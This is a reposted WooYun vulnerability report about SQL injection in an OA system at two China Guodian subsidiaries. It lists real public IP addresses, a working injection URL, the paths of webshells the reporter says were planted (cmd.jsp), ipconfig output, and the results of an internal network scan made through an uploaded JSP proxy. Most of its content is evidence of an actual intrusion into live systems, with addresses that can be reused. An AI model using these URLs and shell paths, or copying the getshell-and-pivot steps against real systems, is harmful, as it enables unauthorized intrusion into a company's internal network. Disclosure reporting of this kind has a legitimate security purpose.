神刀安全网

漏洞标题: 中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

漏洞详情

披露状态:

2016-03-07: 细节已通知厂商并且等待厂商处理中
2016-03-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

涉及到内网安全

详细说明:

code 区域
http://60.13.13.239:8080/yyoa/

http://60.13.13.239:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database()

code 区域
序号 @@basedir
1 D:/Program Files/UFseeyon/OA/mysql/bin/../

具体拿shell方法见

code 区域
 WooYun: 东方航空传媒公司一个被忽略漏洞引发的血案(可getshell) 

得到shell

code 区域
http://60.13.13.239:8080/yyoa/wel.jsp
http://60.13.13.239:8080/yyoa/cmd.jsp

漏洞标题:  中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

ipconfig

code 区域
以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::50fc:d4c8:8aee:b822%11
IPv4 地址 . . . . . . . . . . . . : 10.100.130.5
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.100.130.254

传了一个内网扫描的jsp代理

code 区域
http://10.100.130.4 >> >>Apache-Coyote/1.1 >>Success
http://10.100.130.5 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.100.130.11 >> >>Microsoft-IIS/6.0 >>Success
http://10.100.130.12 >> >>Microsoft-IIS/6.0 >>Success
http://10.100.130.6 >> ���>>Apache >>Success
http://10.100.130.101 >> ���>>Apache >>Success
http://10.100.130.253 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
http://10.100.130.252 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success

一些内部文档信息和log

漏洞标题:  中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

漏洞标题:  中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

漏洞证明:

code 区域
http://222.89.154.134:8080/yyoa/

shell地址:

http://222.89.154.134:8080/yyoa/cmd.jsp

漏洞标题:  中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

修复方案:

升级程序,打补丁

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮